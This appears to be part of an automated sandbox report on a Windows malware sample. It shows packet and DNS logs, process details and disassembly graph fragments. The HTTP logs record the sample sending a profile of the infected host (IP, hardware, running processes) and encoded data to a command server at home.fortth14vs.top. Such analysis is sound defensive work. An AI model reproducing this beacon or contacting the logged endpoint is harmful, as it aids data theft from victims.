                                      Dec 31, 2024 09:45:38.185261011 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185296059 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185301065 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185347080 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185352087 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185357094 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:43.047772884 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:43.047838926 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:43.047972918 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:43.048235893 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:43.053081989 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:44.056591988 CET4971580192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:44.061364889 CET804971591.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:44.061446905 CET4971580192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:44.061618090 CET4971580192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:44.066349030 CET804971591.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:44.784575939 CET804971591.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:44.784640074 CET804971591.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:44.784702063 CET4971580192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:44.785032034 CET4971580192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:44.789818048 CET804971591.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:44.943871021 CET4971680192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:44.948666096 CET804971691.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:44.948765039 CET4971680192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:44.948961973 CET4971680192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:44.953748941 CET804971691.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:45.815129995 CET804971691.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:45.815155029 CET804971691.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:45.815256119 CET4971680192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:45.815613985 CET4971680192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:45.820339918 CET804971691.149.241.220192.168.2.12

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 31, 2024 09:45:34.978200912 CET5112453192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:34.978256941 CET5112453192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:34.985717058 CET53511241.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:34.985769987 CET53511241.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:36.917809010 CET5112753192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:36.917880058 CET5112753192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:37.009717941 CET53511271.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:37.611953020 CET53511271.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:43.108728886 CET5583053192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:43.108798027 CET5583053192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:43.892755985 CET53558301.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:44.055700064 CET53558301.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:44.849580050 CET5583253192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:44.849634886 CET5583253192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:44.942926884 CET53558321.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:44.942944050 CET53558321.1.1.1192.168.2.12

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 31, 2024 09:45:34.978200912 CET192.168.2.121.1.1.10xfc7bStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                      Dec 31, 2024 09:45:34.978256941 CET192.168.2.121.1.1.10x6f6fStandard query (0)httpbin.org28IN (0x0001)false
                                      Dec 31, 2024 09:45:36.917809010 CET192.168.2.121.1.1.10xfbe0Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                      Dec 31, 2024 09:45:36.917880058 CET192.168.2.121.1.1.10x9ce0Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                      Dec 31, 2024 09:45:37.021233082 CET192.168.2.121.1.1.10x9ce0Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                      Dec 31, 2024 09:45:43.108728886 CET192.168.2.121.1.1.10xea20Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                      Dec 31, 2024 09:45:43.108798027 CET192.168.2.121.1.1.10xd127Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                      Dec 31, 2024 09:45:44.849580050 CET192.168.2.121.1.1.10xf72eStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                      Dec 31, 2024 09:45:44.849634886 CET192.168.2.121.1.1.10xc651Standard query (0)home.fortth14vs.top28IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 31, 2024 09:45:34.985769987 CET1.1.1.1192.168.2.120xfc7bNo error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                      Dec 31, 2024 09:45:34.985769987 CET1.1.1.1192.168.2.120xfc7bNo error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                      Dec 31, 2024 09:45:37.611953020 CET1.1.1.1192.168.2.120xfbe0No error (0)home.fortth14vs.top91.149.241.220A (IP address)IN (0x0001)false
                                      Dec 31, 2024 09:45:43.892755985 CET1.1.1.1192.168.2.120xea20No error (0)home.fortth14vs.top91.149.241.220A (IP address)IN (0x0001)false
                                      Dec 31, 2024 09:45:44.942926884 CET1.1.1.1192.168.2.120xf72eNo error (0)home.fortth14vs.top91.149.241.220A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • httpbin.org
                                      • home.fortth14vs.top

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.124971391.149.241.220806812C:\Users\user\Desktop\yqUQPPp0LM.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 31, 2024 09:45:37.720835924 CET12360OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                      Host: home.fortth14vs.top
                                      Accept: */*
                                      Content-Type: application/json
                                      Content-Length: 502551
                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 31 36 35 38 39 39 30 39 36 36 38 32 34 35 32 39 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "8516589909668245295", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 336 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 580 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 760 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "fontdrvhost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": 876 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 404 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe" [TRUNCATED]
                                      Dec 31, 2024 09:45:37.725852013 CET12360OUTData Raw: 56 6e 6b 67 53 34 38 6b 53 69 46 33 6b 4d 57 37 79 5c 2f 4d 6b 32 37 32 5c 2f 52 66 42 37 36 55 33 67 4c 34 2b 35 74 6e 47 52 2b 45 66 69 42 68 2b 4c 38 31 79 44 41 55 73 30 7a 66 42 30 73 68 34 71 79 65 70 67 38 42 57 78 4d 63 4a 54 78 45 70 63
                                      Data Ascii: VnkgS48kSiF3kMW7y\/Mk272\/RfB76U3gL4+5tnGR+EfiBh+L81yDAUs0zfB0sh4qyepg8BWxMcJTxEpcQ5HlNKqniZxpOFCpVqwck5wjF8x+b+K\/0a\/G3wPyzKs48UuBsRwplud46pluV4qrnXDWaxxWNpYeWKqUFDIs5zSrSaw8ZVFOvTpU5JNRnKWh5\/RT2XHI6fyplf0CfhgUUUUGlPr8v1IXj5D+\/+f1\/z6NqxX7
                                      Dec 31, 2024 09:45:37.725879908 CET2472OUTData Raw: 2b 6d 58 35 5c 2f 53 6f 66 4c 2b 62 5c 2f 6c 6d 6e 6d 65 6d 54 36 66 35 5c 2f 38 41 72 56 70 54 36 5c 2f 4c 39 54 71 70 31 50 6c 62 38 50 2b 42 76 30 31 49 57 62 7a 4a 48 33 70 73 74 70 50 38 41 6e 70 5c 2f 72 38 65 33 54 5c 2f 50 30 7a 55 4b 79
                                      Data Ascii: +mX5\/SofL+b\/lmnmemT6f5\/8ArVpT6\/L9Tqp1Plb8P+Bv01IWbzJH3pstpP8Anp\/r8e3T\/P0zUKyeXvfZ8nm+bj8vz755olV1+d0jh8z\/AJ6fvz\/n\/PvT9zxR7\/O2eXL5Xfz5u1aGxDz+5SNJH3+vH6f\/AF6rbvLP\/Pby+f8Aph3\/AD\/L9cVN8nluu\/182PyvJ\/L\/AD+FHztvh6fvf+eXX9fp0qff\/u\/
                                      Dec 31, 2024 09:45:37.725955009 CET4944OUTData Raw: 77 36 38 56 57 54 78 57 6d 6f 36 58 34 6f 74 72 2b 31 6b 6a 6e 73 62 6d 57 47 61 4b 36 73 37 6d 4a 6f 35 6f 35 39 4b 6d 43 74 50 61 58 45 4c 50 48 4c 48 63 51 7a 51 53 78 6c 31 62 63 75 52 58 38 47 66 53 52 34 37 70 65 48 76 47 6c 58 41 35 70 6c
                                      Data Ascii: w68VWTxWmo6X4otr+1kjnsbmWGaK6s7mJo5o59KmCtPaXELPHLHcQzQSxl1bcuRX8GfSR47peHvGlXA5plUc64f4uy7hjOcZgKlDGQ9picizLE0KkcFmFHEYajhcXXwuBp4XFc8q8vqlWlKVDSjI\/09+h\/wDX8T\/Dd47KM1jkfFHBmbcXZBgc1hXwVSphcHxDlmBxlKpjMtr0MVXxWEo4zMK2IwjjTw8HiqOIpxxCbrRPzV\
                                      Dec 31, 2024 09:45:37.726005077 CET4944OUTData Raw: 68 53 6b 58 2b 50 30 5c 2f 77 37 55 79 72 55 76 66 38 41 33 66 38 41 47 6f 4e 68 39 76 38 41 50 34 55 48 51 51 39 33 2b 67 5c 2f 6c 55 56 57 4b 72 31 70 37 50 7a 5c 2f 44 5c 2f 67 6d 31 4f 70 38 5c 2f 31 5c 2f 34 50 5c 2f 42 30 43 6f 5c 2f 4c 39
                                      Data Ascii: hSkX+P0\/w7UyrUvf8A3f8AGoNh9v8AP4UHQQ93+g\/lUVWKr1p7Pz\/D\/gm1Op8\/1\/4P\/B0Co\/L9\/wBP\/r1JUY\/5afj\/AFrM6Pf\/ALv4kMi4\/D+R\/wA\/zqGrFQv94\/h\/IUGvO\/L+vmV2Xbjvmm1YqJ+v4f1NBqMqCSP5eufw\/wA9elT0UHQUpI\/l44+vf\/PT6fqypn+6fw\/mKhoOgh5Y\/wCeKZ\/G
                                      Dec 31, 2024 09:45:37.730735064 CET2472OUTData Raw: 78 7a 4e 34 4d 75 72 4b 38 31 71 7a 31 65 31 38 49 65 49 56 6c 75 4c 4c 55 4e 4f 6d 73 52 72 65 49 39 49 38 4f 2b 43 59 50 69 65 5c 2f 78 44 2b 4d 5c 2f 77 4a 38 42 54 5c 2f 44 4c 34 39 66 46 48 39 6d 38 36 64 72 6d 70 66 48 44 57 62 5c 2f 78 70
                                      Data Ascii: xzN4MurK81qz1e18IeIVluLLUNOmsRreI9I8O+CYPie\/xD+M\/wJ8BT\/DL49fFH9m86drmpfHDWb\/xp8T\/AIQ+E\/BXjLxhYeEh4C+AHjOzg0+LSviD4ZistQ8aXvhBJr67ljmjtrW3e7P5njPGHwwwNdYXE8Z5UsY8fmeWLBUVisVjv7QyfH5flmZYP6lhcPWxX1jDY3Nssoun7HmqLH4StR9pQr06kv2HAeAnjDmVJ4nC
                                      Dec 31, 2024 09:45:37.730823040 CET2472OUTData Raw: 4a 6e 77 69 7a 69 68 78 76 77 44 77 52 58 77 65 4d 34 70 79 48 4e 63 6d 77 64 58 50 4d 50 6c 45 71 57 5a 5a 50 51 78 32 46 7a 48 4e 35 34 58 42 35 6e 6a 38 4a 57 61 79 37 45 35 46 53 71 59 37 46 52 69 6f 34 43 6e 51 71 72 46 53 70 51 6d 37 5c 2f
                                      Data Ascii: JnwizihxvwDwRXweM4pyHNcmwdXPMPlEqWZZPQx2FzHN54XB5nj8JWay7E5FSqY7FRio4CnQqrFSpQm7\/wBA\/wDw\/XP\/AEayP\/D4f\/igo\/4frn\/o1kf+Hw\/\/ABQV+ClxpOi+HbHxxcfFH4r\/AAb+DWoeBv2gvil+zNN4f8dXvxm1nWfEnxQ+D+heD\/EXi+18MH4S\/Az4n6I+i\/2X468OS6VrHiPWfDVvqBvg6
                                      Dec 31, 2024 09:45:37.730833054 CET2472OUTData Raw: 66 50 61 58 63 2b 4a 34 37 38 4c 77 2b 44 70 58 67 30 58 34 6c 5c 2f 43 48 34 6f 58 69 66 73 32 57 76 37 56 68 30 6a 34 65 33 58 78 72 6a 38 53 74 38 4b 74 63 2b 4a 33 67 62 34 54 2b 42 32 5c 2f 77 43 45 55 2b 49 6e 77 49 2b 48 33 69 53 50 78 4e
                                      Data Ascii: fPaXc+J478Lw+DpXg0X4l\/CH4oXifs2Wv7Vh0j4e3Xxrj8St8Ktc+J3gb4T+B2\/wCEU+InwI+H3iSPxN8SfEfj\/R9U8AaFc6Zbv4h8HoPFkdzDpGv+CpvFX5q\/o6fRAhClVq+IniXh6FfHY3LKWJxXE\/EeFwksyyynjKuY4D63ieHqWGjjcDDLsc8XhpVVWoPCYmNWEZ0qkV+yw+nH9OerWr4bD\/R4+jNisXhsJgcwr4L
                                      Dec 31, 2024 09:45:37.730865955 CET2472OUTData Raw: 6d 7a 2b 35 31 7a 5c 2f 77 41 74 65 6e 54 70 56 62 37 75 78 31 2b 5c 2f 35 74 78 30 34 38 37 38 4b 30 39 70 35 66 6a 5c 2f 41 4d 41 31 68 74 38 5c 2f 30 52 43 32 5c 2f 64 38 6e 79 66 38 41 58 50 74 5c 2f 68 36 55 2b 53 54 39 33 73 52 50 39 58 5c
                                      Data Ascii: mz+51z\/wAtenTpVb7ux1+\/5tx04878K09p5fj\/AMA1ht8\/0RC2\/d8nyf8AXPt\/h6U+ST93sRP9X\/y0\/wA\/T+nQcyHf5mzl\/s\/9\/wDD8aq7tv8AH8446\/8Ak1\/n1\/CtCx5Z+U\/79SSf5\/z+tQ\/P5e8\/J+XX\/p0\/lT\/9YB8n7r\/ll3\/zwfzzUK5+4f8ASU\/66\/v4fw5\/lXOdfO\/L+vmMm+78k
                                      Dec 31, 2024 09:45:37.731103897 CET4944OUTData Raw: 6f 62 78 51 52 6a 50 7a 75 4c 6d 32 66 48 79 68 6a 39 31 54 30 42 72 7a 7a 34 34 5c 2f 74 52 5c 2f 44 66 34 6f 66 74 4e 65 4d 66 6a 46 38 51 74 47 38 4d 79 5c 2f 42 37 34 4e 66 38 46 4c 50 68 35 2b 30 58 34 4b 38 50 38 41 77 31 2b 42 53 65 41 34
                                      Data Ascii: obxQRjPzuLm2fHyhj91T0Brzz44\/tR\/Df4oftNeMfjF8QtG8My\/B74Nf8FLPh5+0X4K8P8Aw1+BSeA4P23P2bdW8R22geMNC+Mng3wx4G8D6N8QPjZ8HfD+n33ib4a+Of2j7a38SeK\/BvxC+L\/gHxN8QI7zU9A03U\/p2SNJUaOVEkjcYdJFDow9GVgVYexBFZj6DockQgk0XSZIQciF9Os2iByTkRtCUzkk5xnJJ71\/P
                                      Dec 31, 2024 09:45:37.779155970 CET34608OUTData Raw: 4c 7a 78 72 34 75 38 4a 36 31 34 4a 75 5c 2f 41 65 6b 61 58 66 61 74 78 6e 68 50 78 54 4c 34 48 38 44 5c 2f 41 4c 53 58 67 2b 4c 39 70 66 38 41 34 4a 77 65 46 66 69 74 38 54 5c 2f 46 58 37 44 33 6a 72 77 74 34 2b 75 66 32 43 50 46 58 6a 48 39 6c
                                      Data Ascii: Lzxr4u8J614Ju\/AekaXfatxnhPxTL4H8D\/ALSXg+L9pf8A4JweFfit8T\/FX7D3jrwt4+uf2CPFXjH9lzWNK+Clv+0DZeP7Dw78B4P+CatzoHgL4kaCPGHgi90vX7P4AeBrm8l1XUrvQviJb6rL4guK+jLnQtDvXEl5o2lXcgGBJc6dZzuBxwGlhdgOBxnsKrf8It4Y\/wChc0H\/AME+n\/8AyPX8uv6E+QU6+eSwvFuPoYb
                                      Dec 31, 2024 09:45:43.047772884 CET157INHTTP/1.1 200 OK
                                      Server: nginx/1.22.1
                                      Date: Tue, 31 Dec 2024 08:45:42 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 1
                                      Connection: close
                                      Data Raw: 30
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.124971591.149.241.220806812C:\Users\user\Desktop\yqUQPPp0LM.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 31, 2024 09:45:44.061618090 CET99OUTGET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                      Host: home.fortth14vs.top
                                      Accept: */*
                                      Dec 31, 2024 09:45:44.784575939 CET372INHTTP/1.1 404 NOT FOUND
                                      Server: nginx/1.22.1
                                      Date: Tue, 31 Dec 2024 08:45:44 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 207
                                      Connection: close
                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                      Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.124971691.149.241.220806812C:\Users\user\Desktop\yqUQPPp0LM.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 31, 2024 09:45:44.948961973 CET172OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                      Host: home.fortth14vs.top
                                      Accept: */*
                                      Content-Type: application/json
                                      Content-Length: 31
                                      Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                      Data Ascii: { "id1": "0", "data": "Done1" }
                                      Dec 31, 2024 09:45:45.815129995 CET372INHTTP/1.1 404 NOT FOUND
                                      Server: nginx/1.22.1
                                      Date: Tue, 31 Dec 2024 08:45:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 207
                                      Connection: close
                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                      Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.124971134.197.122.1724436812C:\Users\user\Desktop\yqUQPPp0LM.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-31 08:45:35 UTC52OUTGET /ip HTTP/1.1
                                      Host: httpbin.org
                                      Accept: */*
                                      2024-12-31 08:45:35 UTC224INHTTP/1.1 200 OK
                                      Date: Tue, 31 Dec 2024 08:45:35 GMT
                                      Content-Type: application/json
                                      Content-Length: 31
                                      Connection: close
                                      Server: gunicorn/19.9.0
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: true
                                      2024-12-31 08:45:35 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                      Data Ascii: { "origin": "8.46.123.189"}


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:03:45:32
                                      Start date:31/12/2024
                                      Path:C:\Users\user\Desktop\yqUQPPp0LM.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\yqUQPPp0LM.exe"
                                      Imagebase:0x830000
                                      File size:4'472'832 bytes
                                      MD5 hash:00DACDC02143F49BA6542161592FEA9D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3.9%
                                        Dynamic/Decrypted Code Coverage:20.1%
                                        Signature Coverage:10.7%
                                        Total number of Nodes:747
                                        Total number of Limit Nodes:135
                                        execution_graph 83468 84d5e0 83469 84d5f0 83468->83469 83470 84d652 WSAStartup 83468->83470 83473 84d67c 83469->83473 83475 84d690 _open 83469->83475 83470->83469 83472 84d664 83470->83472 83474 84d5fa 83475->83474 82852 86e400 82853 86e412 82852->82853 82857 86e459 82852->82857 82854 86e422 82853->82854 82876 883030 _open 82853->82876 82877 8909d0 _open 82854->82877 82859 86e4a8 82857->82859 82862 86e495 82857->82862 82864 86b5a0 82857->82864 82858 86e42b 82878 8668b0 7 API calls 82858->82878 82862->82859 82863 86b5a0 _open 82862->82863 82863->82859 82865 86b5d2 82864->82865 82866 86b5c0 82864->82866 82865->82862 82866->82865 82867 86b713 82866->82867 82872 86b626 82866->82872 82880 874f40 _open 82867->82880 82869 86b65a 82869->82865 82870 86b72b 82869->82870 82871 86b737 82869->82871 82870->82865 82881 8750a0 _open 82870->82881 82871->82865 82882 8750a0 _open 82871->82882 82872->82865 82872->82869 82872->82870 82872->82871 82879 8750a0 _open 82872->82879 82876->82854 82877->82858 82878->82857 82879->82872 82880->82865 82881->82865 82882->82865 82883 86b400 82884 86b425 82883->82884 82885 86b40b 82883->82885 82888 837770 82885->82888 82886 86b421 82889 837790 82888->82889 82890 8377b6 recv 82888->82890 82889->82890 82891 837799 82889->82891 82892 8377a3 82890->82892 82898 8377d4 82890->82898 82891->82892 82893 8377db 82891->82893 82899 8372a0 _open 82892->82899 82900 8372a0 _open 82893->82900 82896 8377ec 82901 83cb20 _open 82896->82901 82898->82886 82899->82898 82900->82896 82901->82898 82902 86b3c0 82903 86b3ee 82902->82903 82904 86b3cb 82902->82904 82908 869290 82904->82908 82922 8376a0 82904->82922 82905 86b3ea 82909 8376a0 2 API calls 82908->82909 82910 8692e5 82909->82910 82911 8693c3 82910->82911 82914 8692f3 82910->82914 82913 869392 82911->82913 82933 84d090 _open 82911->82933 82912 8693be 82912->82905 82913->82912 82935 8750a0 _open 82913->82935 82914->82913 82918 869335 WSAIoctl 82914->82918 82916 8693f7 82934 874f40 _open 82916->82934 82918->82913 82920 869366 82918->82920 82920->82913 82921 869371 setsockopt 82920->82921 82921->82913 82923 8376c0 82922->82923 82924 8376e6 send 82922->82924 82923->82924 82925 8376c9 82923->82925 82926 8376d3 82924->82926 82932 837704 82924->82932 82925->82926 82927 83770b 82925->82927 82936 8372a0 _open 82926->82936 82937 8372a0 _open 82927->82937 82930 83771c 82938 83cb20 _open 82930->82938 82932->82905 82933->82916 82934->82913 82935->82912 82936->82932 82937->82930 82938->82932 82939 86f100 82940 86f11f 82939->82940 82947 86f1b8 82939->82947 82943 86f2a3 82940->82943 82940->82947 82958 86f240 82940->82958 82967 86f603 82940->82967 82941 86ff1a 82982 870c80 _open 82941->82982 82974 874f40 _open 82943->82974 82945 870045 82945->82947 82949 87010d 82945->82949 82952 87004d 82945->82952 82985 8750a0 _open 82945->82985 82946 86f80d 82951 87015e 82949->82951 82986 8750a0 _open 82949->82986 82950 87008a 82984 874f40 _open 82950->82984 82951->82952 82987 8750a0 _open 82951->82987 82988 874f40 _open 82952->82988 82958->82947 82975 837310 _open 82958->82975 82960 86f491 82960->82967 82977 837310 _open 82960->82977 82962 86ff5b 82962->82947 82983 8750a0 _open 82962->82983 82965 870d30 _open 82965->82967 82966 86f3ce 82966->82947 82966->82960 82976 8750a0 _open 82966->82976 82967->82941 82967->82945 82967->82946 82967->82950 82967->82965 82971 8750a0 _open 82967->82971 82980 83fa50 _open 82967->82980 82981 874fd0 _open 82967->82981 82969 86f5b9 82979 83fa50 _open 82969->82979 82971->82967 82972 86f50d 82972->82947 82972->82969 82978 8750a0 _open 82972->82978 82974->82947 82975->82966 82976->82960 82977->82972 82978->82969 82979->82967 82980->82967 82981->82967 82982->82962 82983->82947 82984->82947 82985->82949 82986->82951 82987->82952 82988->82947 82989 870700 82992 87099d 82989->82992 82996 870719 82989->82996 82993 8709f6 83015 8375a0 82993->83015 82996->82992 82996->82993 82997 870a35 82996->82997 82998 8709b5 82996->82998 83007 837310 _open 82996->83007 83008 86b8e0 _open 82996->83008 83009 89f570 _open 82996->83009 83010 85eb30 _open 82996->83010 83011 8913a0 _open 82996->83011 83012 8b39a0 _open 82996->83012 83013 85eae0 _open 82996->83013 83019 874f40 _open 82997->83019 82998->82992 83014 8750a0 _open 82998->83014 83005 8375a0 _open 83005->82992 83007->82996 83008->82996 83009->82996 83010->82996 83011->82996 83012->82996 83013->82996 83014->82992 83016 8375aa 83015->83016 83018 8375d1 83015->83018 83016->83018 83020 8372a0 _open 83016->83020 83018->83005 83019->82992 83020->83018 83021 8313c9 83025 831160 83021->83025 83024 8313a1 83025->83024 83026 bb93e0 83025->83026 83036 bb8a20 _open fgetc isxdigit 83025->83036 83033 bb9400 83026->83033 83035 bb93f3 83026->83035 83027 bb9688 83028 bb96c7 83027->83028 83027->83035 83037 bb9280 vfprintf 83027->83037 83038 bb9220 vfprintf 83028->83038 83031 bb96df 83031->83025 83032 bb9220 vfprintf 